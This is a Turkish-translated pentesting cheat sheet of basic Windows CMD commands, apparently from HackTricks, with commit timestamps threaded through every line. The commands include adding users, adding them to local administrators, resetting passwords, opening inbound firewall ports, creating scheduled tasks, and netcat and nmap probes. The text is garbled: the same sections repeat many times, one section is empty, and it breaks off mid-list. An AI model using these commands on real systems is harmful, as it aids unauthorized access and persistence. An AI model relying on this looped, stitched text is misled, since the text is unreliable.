2024-04-06 19:40:41 +00:00
# Basic Win CMD for Pentesters
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 18:14:16 +00:00
< summary > < strong > AWS hacklemeyi sı fı rdan kahramanlı k seviyesine öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Kı rmı zı Takı m Uzmanı )< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
* Bir **cybersecurity şirketinde** çalı şı yor musunuz? **Şirketinizi HackTricks'te reklamı nı görmek** ister misiniz? veya **PEASS'ı n en son sürümüne veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI** ](https://github.com/sponsors/carlospolop ) kontrol edin!
* [**The PEASS Ailesi'ni** ](https://opensea.io/collection/the-peass-family ), özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuzu keşfedin.
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin.
2024-04-06 19:40:41 +00:00
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) **katı lı n** veya **Twitter** 'da takip edin 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2024-02-10 18:14:16 +00:00
* **Hacking hilelerinizi** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **ve** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **ile göndererek paylaşı n.**
2022-04-28 16:01:33 +00:00
< / details >
2024-02-10 18:14:16 +00:00
## Sistem bilgisi
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
### Sürüm ve Yama bilgisi
2024-04-06 19:40:41 +00:00
2020-07-15 15:43:14 +00:00
```bash
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
2022-10-05 00:11:28 +00:00
wmic computersystem LIST full #Get PC info
2020-07-15 15:43:14 +00:00
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
2022-10-05 00:11:28 +00:00
wmic qfe list brief #Updates
2020-07-15 15:43:14 +00:00
hostname
2022-10-05 00:11:28 +00:00
2020-07-15 15:43:14 +00:00
DRIVERQUERY #3rd party driver vulnerable?
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Ortam
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
### Basic CMD commands for pentesters
### Pentesterler için Temel CMD Komutları
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Information
#### Sistem Bilgisi
2024-04-06 19:40:41 +00:00
**Hostname**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Ana Bilgisayar Adı **
2024-02-10 18:14:16 +00:00
```plaintext
hostname
```
2024-04-06 19:40:41 +00:00
**IP Address**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**IP Adresi**
2024-02-10 18:14:16 +00:00
```plaintext
ipconfig
```
2024-04-06 19:40:41 +00:00
**Network Interfaces**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Ağ Arayüzleri**
2024-02-10 18:14:16 +00:00
```plaintext
netstat -ano
```
2024-04-06 19:40:41 +00:00
**Running Processes**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Çalı şan İşlemler**
2024-02-10 18:14:16 +00:00
```plaintext
tasklist
```
2024-04-06 19:40:41 +00:00
**Installed Software**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Yüklü Yazı lı mlar**
2024-02-10 18:14:16 +00:00
```plaintext
wmic product get name,version
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### File System
#### Dosya Sistemi
2024-04-06 19:40:41 +00:00
**List Files and Directories**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosyaları ve Dizinleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
dir
```
2024-04-06 19:40:41 +00:00
**Change Directory**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dizin Değiştir**
2024-02-10 18:14:16 +00:00
```plaintext
cd < directory >
```
2024-04-06 19:40:41 +00:00
**Create Directory**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dizin Oluştur**
2024-02-10 18:14:16 +00:00
```plaintext
mkdir < directory >
```
2024-04-06 19:40:41 +00:00
**Delete Directory**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dizin Sil**
2024-02-10 18:14:16 +00:00
```plaintext
rmdir < directory >
```
2024-04-06 19:40:41 +00:00
**Copy File**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosya Kopyala**
2024-02-10 18:14:16 +00:00
```plaintext
copy < source > < destination >
```
2024-04-06 19:40:41 +00:00
**Move File**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosya Taşı **
2024-02-10 18:14:16 +00:00
```plaintext
move < source > < destination >
```
2024-04-06 19:40:41 +00:00
**Delete File**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosya Sil**
2024-02-10 18:14:16 +00:00
```plaintext
del < file >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### User Accounts
#### Kullanı cı Hesapları
2024-04-06 19:40:41 +00:00
**List Users**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kullanı cı ları Listele**
2024-02-10 18:14:16 +00:00
```plaintext
net user
```
2024-04-06 19:40:41 +00:00
**Add User**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kullanı cı Ekle**
2024-02-10 18:14:16 +00:00
```plaintext
net user < username > < password > /add
```
2024-04-06 19:40:41 +00:00
**Delete User**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kullanı cı Sil**
2024-02-10 18:14:16 +00:00
```plaintext
net user < username > /delete
```
2024-04-06 19:40:41 +00:00
**Change User Password**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kullanı cı Şifresini Değiştir**
2024-02-10 18:14:16 +00:00
```plaintext
net user < username > < new_password >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### Network
#### Ağ
2024-04-06 19:40:41 +00:00
**Ping**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Ping**
2024-02-10 18:14:16 +00:00
```plaintext
ping < ip_address >
```
2024-04-06 19:40:41 +00:00
**Traceroute**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Traceroute**
2024-02-10 18:14:16 +00:00
```plaintext
tracert < ip_address >
```
2024-04-06 19:40:41 +00:00
**Port Scan**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Port Taraması **
2024-02-10 18:14:16 +00:00
```plaintext
nmap -p < port > < ip_address >
```
2024-04-06 19:40:41 +00:00
**Netcat**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Netcat**
2024-02-10 18:14:16 +00:00
```plaintext
nc -v < ip_address > < port >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### Services
#### Servisler
2024-04-06 19:40:41 +00:00
**List Running Services**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Çalı şan Servisleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
net start
```
2024-04-06 19:40:41 +00:00
**Stop Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Durdur**
2024-02-10 18:14:16 +00:00
```plaintext
net stop < service_name >
```
2024-04-06 19:40:41 +00:00
**Start Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Başlat**
2024-02-10 18:14:16 +00:00
```plaintext
net start < service_name >
```
2024-04-06 19:40:41 +00:00
**Restart Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Yeniden Başlat**
2024-02-10 18:14:16 +00:00
```plaintext
net stop < service_name > & & net start < service_name >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### Registry
#### Kayı t Defteri
2024-04-06 19:40:41 +00:00
**List Registry Keys**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kayı t Defteri Anahtarları nı Listele**
2024-02-10 18:14:16 +00:00
```plaintext
reg query HKLM\Software
```
2024-04-06 19:40:41 +00:00
**Read Registry Key Value**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kayı t Defteri Anahtar Değerini Oku**
2024-02-10 18:14:16 +00:00
```plaintext
reg query HKLM\Software\Microsoft\Windows\CurrentVersion /v < key_name >
```
2024-04-06 19:40:41 +00:00
**Modify Registry Key Value**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kayı t Defteri Anahtar Değerini Değiştir**
2024-02-10 18:14:16 +00:00
```plaintext
reg add HKLM\Software\Microsoft\Windows\CurrentVersion /v < key_name > /t REG_SZ /d < value > /f
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### Task Scheduler
#### Görev Zamanlayı cı sı
2024-04-06 19:40:41 +00:00
**List Scheduled Tasks**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Zamanlanmı ş Görevleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
schtasks /query /fo LIST /v
```
2024-04-06 19:40:41 +00:00
**Create Scheduled Task**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Zamanlanmı ş Görev Oluştur**
2024-02-10 18:14:16 +00:00
```plaintext
schtasks /create /tn < task_name > /tr < command > /sc < schedule > /st < start_time > /ru < username > /rp < password >
```
2024-04-06 19:40:41 +00:00
**Delete Scheduled Task**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Zamanlanmı ş Görevi Sil**
2024-02-10 18:14:16 +00:00
```plaintext
schtasks /delete /tn < task_name > /f
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### Event Viewer
#### Olay Görüntüleyici
2024-04-06 19:40:41 +00:00
**List Event Logs**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Olay Günlüklerini Listele**
2024-02-10 18:14:16 +00:00
```plaintext
wevtutil el
```
2024-04-06 19:40:41 +00:00
**Read Event Log**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Olay Günlüğünü Oku**
2024-02-10 18:14:16 +00:00
```plaintext
wevtutil qe < log_name >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### Firewall
#### Güvenlik Duvarı
2024-04-06 19:40:41 +00:00
**List Firewall Rules**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Güvenlik Duvarı Kuralları nı Listele**
2024-02-10 18:14:16 +00:00
```plaintext
netsh advfirewall firewall show rule name=all
```
2024-04-06 19:40:41 +00:00
**Add Firewall Rule**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Güvenlik Duvarı Kuralı Ekle**
2024-02-10 18:14:16 +00:00
```plaintext
netsh advfirewall firewall add rule name=< rule_name > dir=in action=allow protocol=< protocol > localport=< port >
```
2024-04-06 19:40:41 +00:00
**Delete Firewall Rule**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Güvenlik Duvarı Kuralı nı Sil**
2024-02-10 18:14:16 +00:00
```plaintext
netsh advfirewall firewall delete rule name=< rule_name >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Services
#### Sistem Servisleri
2024-04-06 19:40:41 +00:00
**List Running Services**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Çalı şan Servisleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
sc query state=running
```
2024-04-06 19:40:41 +00:00
**Stop Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Durdur**
2024-02-10 18:14:16 +00:00
```plaintext
sc stop < service_name >
```
2024-04-06 19:40:41 +00:00
**Start Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Başlat**
2024-02-10 18:14:16 +00:00
```plaintext
sc start < service_name >
```
2024-04-06 19:40:41 +00:00
**Restart Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Yeniden Başlat**
2024-02-10 18:14:16 +00:00
```plaintext
sc stop < service_name > & & sc start < service_name >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### Task Manager
#### Görev Yöneticisi
2024-04-06 19:40:41 +00:00
**List Running Processes**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Çalı şan İşlemleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
tasklist
```
2024-04-06 19:40:41 +00:00
**Kill Process**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**İşlemi Sonlandı r**
2024-02-10 18:14:16 +00:00
```plaintext
taskkill /F /PID < process_id >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Configuration
#### Sistem Yapı landı rması
2024-04-06 19:40:41 +00:00
**List Startup Programs**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Başlangı ç Programları nı Listele**
2024-02-10 18:14:16 +00:00
```plaintext
wmic startup get caption,command
```
2024-04-06 19:40:41 +00:00
**Disable Startup Program**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Başlangı ç Programı nı Devre Dı şı Bı rak**
2024-02-10 18:14:16 +00:00
```plaintext
wmic startup where caption="< program_name > " call delete
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Accounts
#### Sistem Hesapları
2024-04-06 19:40:41 +00:00
**List Local Administrators**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Yerel Yöneticileri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
net localgroup administrators
```
2024-04-06 19:40:41 +00:00
**Add User to Local Administrators**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kullanı cı yı Yerel Yöneticilere Ekle**
2024-02-10 18:14:16 +00:00
```plaintext
net localgroup administrators < username > /add
```
2024-04-06 19:40:41 +00:00
**Remove User from Local Administrators**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kullanı cı yı Yerel Yöneticilerden Kaldı r**
2024-02-10 18:14:16 +00:00
```plaintext
net localgroup administrators < username > /delete
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Logs
#### Sistem Günlükleri
2024-04-06 19:40:41 +00:00
**List Windows Event Logs**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Windows Olay Günlüklerini Listele**
2024-02-10 18:14:16 +00:00
```plaintext
wevtutil el
```
2024-04-06 19:40:41 +00:00
**Read Windows Event Log**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Windows Olay Günlüğünü Oku**
2024-02-10 18:14:16 +00:00
```plaintext
wevtutil qe < log_name >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Processes
#### Sistem İşlemleri
2024-04-06 19:40:41 +00:00
**List Running Processes**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Çalı şan İşlemleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
tasklist
```
2024-04-06 19:40:41 +00:00
**Kill Process**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**İşlemi Sonlandı r**
2024-02-10 18:14:16 +00:00
```plaintext
taskkill /F /PID < process_id >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Drivers
#### Sistem Sürücüleri
2024-04-06 19:40:41 +00:00
**List Installed Drivers**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Yüklü Sürücüleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
driverquery
```
2024-04-06 19:40:41 +00:00
**Disable Driver**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Sürücüyü Devre Dı şı Bı rak**
2024-02-10 18:14:16 +00:00
```plaintext
sc config < driver_name > start=disabled
```
2024-04-06 19:40:41 +00:00
**Enable Driver**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Sürücüyü Etkinleştir**
2024-02-10 18:14:16 +00:00
```plaintext
sc config < driver_name > start=demand
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Startup
#### Sistem Başlangı cı
2024-04-06 19:40:41 +00:00
**List Startup Programs**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Başlangı ç Programları nı Listele**
2024-02-10 18:14:16 +00:00
```plaintext
wmic startup get caption,command
```
2024-04-06 19:40:41 +00:00
**Disable Startup Program**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Başlangı ç Programı nı Devre Dı şı Bı rak**
2024-02-10 18:14:16 +00:00
```plaintext
wmic startup where caption="< program_name > " call delete
```
2024-04-06 19:40:41 +00:00
**Enable Startup Program**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Başlangı ç Programı nı Etkinleştir**
2024-02-10 18:14:16 +00:00
```plaintext
wmic startup where caption="< program_name > " call create
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Services
#### Sistem Servisleri
2024-04-06 19:40:41 +00:00
**List Running Services**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Çalı şan Servisleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
sc query state=running
```
2024-04-06 19:40:41 +00:00
**Stop Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Durdur**
2024-02-10 18:14:16 +00:00
```plaintext
sc stop < service_name >
```
2024-04-06 19:40:41 +00:00
**Start Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Başlat**
2024-02-10 18:14:16 +00:00
```plaintext
sc start < service_name >
```
2024-04-06 19:40:41 +00:00
**Restart Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Yeniden Başlat**
2024-02-10 18:14:16 +00:00
```plaintext
sc stop < service_name > & & sc start < service_name >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Registry
#### Sistem Kayı t Defteri
2024-04-06 19:40:41 +00:00
**List Registry Keys**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kayı t Defteri Anahtarları nı Listele**
2024-02-10 18:14:16 +00:00
```plaintext
reg query HKLM\Software
```
2024-04-06 19:40:41 +00:00
**Read Registry Key Value**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kayı t Defteri Anahtar Değerini Oku**
2024-02-10 18:14:16 +00:00
```plaintext
reg query HKLM\Software\Microsoft\Windows\CurrentVersion /v < key_name >
```
2024-04-06 19:40:41 +00:00
**Modify Registry Key Value**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kayı t Defteri Anahtar Değerini Değiştir**
2024-02-10 18:14:16 +00:00
```plaintext
reg add HKLM\Software\Microsoft\Windows\CurrentVersion /v < key_name > /t REG_SZ /d < value > /f
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Network
#### Sistem Ağı
2024-04-06 19:40:41 +00:00
**List Network Interfaces**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Ağ Arayüzlerini Listele**
2024-02-10 18:14:16 +00:00
```plaintext
netsh interface show interface
```
2024-04-06 19:40:41 +00:00
**Disable Network Interface**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Ağ Arayüzünü Devre Dı şı Bı rak**
2024-02-10 18:14:16 +00:00
```plaintext
netsh interface set interface "< interface_name > " admin=disable
```
2024-04-06 19:40:41 +00:00
**Enable Network Interface**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Ağ Arayüzünü Etkinleştir**
2024-02-10 18:14:16 +00:00
```plaintext
netsh interface set interface "< interface_name > " admin=enable
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Firewall
#### Sistem Güvenlik Duvarı
2024-04-06 19:40:41 +00:00
**List Firewall Rules**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Güvenlik Duvarı Kuralları nı Listele**
2024-02-10 18:14:16 +00:00
```plaintext
netsh advfirewall firewall show rule name=all
```
2024-04-06 19:40:41 +00:00
**Add Firewall Rule**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Güvenlik Duvarı Kuralı Ekle**
2024-02-10 18:14:16 +00:00
```plaintext
netsh advfirewall firewall add rule name=< rule_name > dir=in action=allow protocol=< protocol > localport=< port >
```
2024-04-06 19:40:41 +00:00
**Delete Firewall Rule**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Güvenlik Duvarı Kuralı nı Sil**
2024-02-10 18:14:16 +00:00
```plaintext
netsh advfirewall firewall delete rule name=< rule_name >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Accounts
#### Sistem Hesapları
2024-04-06 19:40:41 +00:00
**List Local Administrators**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Yerel Yöneticileri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
net localgroup administrators
```
2024-04-06 19:40:41 +00:00
**Add User to Local Administrators**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kullanı cı yı Yerel Yöneticilere Ekle**
2024-02-10 18:14:16 +00:00
```plaintext
net localgroup administrators < username > /add
```
2024-04-06 19:40:41 +00:00
**Remove User from Local Administrators**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kullanı cı yı Yerel Yöneticilerden Kaldı r**
2024-02-10 18:14:16 +00:00
```plaintext
net localgroup administrators < username > /delete
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Files
#### Sistem Dosyaları
2024-04-06 19:40:41 +00:00
**List Files and Directories**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosyaları ve Dizinleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
dir
```
2024-04-06 19:40:41 +00:00
**Change Directory**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dizin Değiştir**
2024-02-10 18:14:16 +00:00
```plaintext
cd < directory >
```
2024-04-06 19:40:41 +00:00
**Create Directory**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dizin Oluştur**
2024-02-10 18:14:16 +00:00
```plaintext
mkdir < directory >
```
2024-04-06 19:40:41 +00:00
**Delete Directory**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dizin Sil**
2024-02-10 18:14:16 +00:00
```plaintext
rmdir < directory >
```
2024-04-06 19:40:41 +00:00
**Copy File**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosya Kopyala**
2024-02-10 18:14:16 +00:00
```plaintext
copy < source > < destination >
```
2024-04-06 19:40:41 +00:00
**Move File**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosya Taşı **
2024-02-10 18:14:16 +00:00
```plaintext
move < source > < destination >
```
2024-04-06 19:40:41 +00:00
**Delete File**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosya Sil**
2024-02-10 18:14:16 +00:00
```plaintext
del < file >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Processes
#### Sistem İşlemleri
2024-04-06 19:40:41 +00:00
**List Running Processes**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Çalı şan İşlemleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
tasklist
```
2024-04-06 19:40:41 +00:00
**Kill Process**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**İşlemi Sonlandı r**
2024-02-10 18:14:16 +00:00
```plaintext
taskkill /F /PID < process_id >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Drivers
#### Sistem Sürücüleri
2024-04-06 19:40:41 +00:00
**List Installed Drivers**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Yüklü Sürücüleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
driverquery
```
2024-04-06 19:40:41 +00:00
**Disable Driver**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Sürücüyü Devre Dı şı Bı rak**
2024-02-10 18:14:16 +00:00
```plaintext
sc config < driver_name > start=disabled
```
2024-04-06 19:40:41 +00:00
**Enable Driver**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Sürücüyü Etkinleştir**
2024-02-10 18:14:16 +00:00
```plaintext
sc config < driver_name > start=demand
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Services
#### Sistem Servisleri
2024-04-06 19:40:41 +00:00
**List Running Services**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Çalı şan Servisleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
sc query state=running
```
2024-04-06 19:40:41 +00:00
**Stop Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Durdur**
2024-02-10 18:14:16 +00:00
```plaintext
sc stop < service_name >
```
2024-04-06 19:40:41 +00:00
**Start Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Başlat**
2024-02-10 18:14:16 +00:00
```plaintext
sc start < service_name >
```
2024-04-06 19:40:41 +00:00
**Restart Service**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Servisi Yeniden Başlat**
2024-02-10 18:14:16 +00:00
```plaintext
sc stop < service_name > & & sc start < service_name >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Configuration
#### Sistem Yapı landı rması
2024-04-06 19:40:41 +00:00
**List Startup Programs**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Başlangı ç Programları nı Listele**
2024-02-10 18:14:16 +00:00
```plaintext
wmic startup get caption,command
```
2024-04-06 19:40:41 +00:00
**Disable Startup Program**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Başlangı ç Programı nı Devre Dı şı Bı rak**
2024-02-10 18:14:16 +00:00
```plaintext
wmic startup where caption="< program_name > " call delete
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Logs
#### Sistem Günlükleri
2024-04-06 19:40:41 +00:00
**List Windows Event Logs**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Windows Olay Günlüklerini Listele**
2024-02-10 18:14:16 +00:00
```plaintext
wevtutil el
```
2024-04-06 19:40:41 +00:00
**Read Windows Event Log**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Windows Olay Günlüğünü Oku**
2024-02-10 18:14:16 +00:00
```plaintext
wevtutil qe < log_name >
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Accounts
#### Sistem Hesapları
2024-04-06 19:40:41 +00:00
**List Local Administrators**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Yerel Yöneticileri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
net localgroup administrators
```
2024-04-06 19:40:41 +00:00
**Add User to Local Administrators**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kullanı cı yı Yerel Yöneticilere Ekle**
2024-02-10 18:14:16 +00:00
```plaintext
net localgroup administrators < username > /add
```
2024-04-06 19:40:41 +00:00
**Remove User from Local Administrators**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Kullanı cı yı Yerel Yöneticilerden Kaldı r**
2024-02-10 18:14:16 +00:00
```plaintext
net localgroup administrators < username > /delete
```
2024-04-06 19:40:41 +00:00
***
2024-02-10 18:14:16 +00:00
#### System Files
#### Sistem Dosyaları
2024-04-06 19:40:41 +00:00
**List Files and Directories**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosyaları ve Dizinleri Listele**
2024-02-10 18:14:16 +00:00
```plaintext
dir
```
2024-04-06 19:40:41 +00:00
**Change Directory**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dizin Değiştir**
2024-02-10 18:14:16 +00:00
```plaintext
cd < directory >
```
2024-04-06 19:40:41 +00:00
**Create Directory**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dizin Oluştur**
2024-02-10 18:14:16 +00:00
```plaintext
mkdir < directory >
```
2024-04-06 19:40:41 +00:00
**Delete Directory**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dizin Sil**
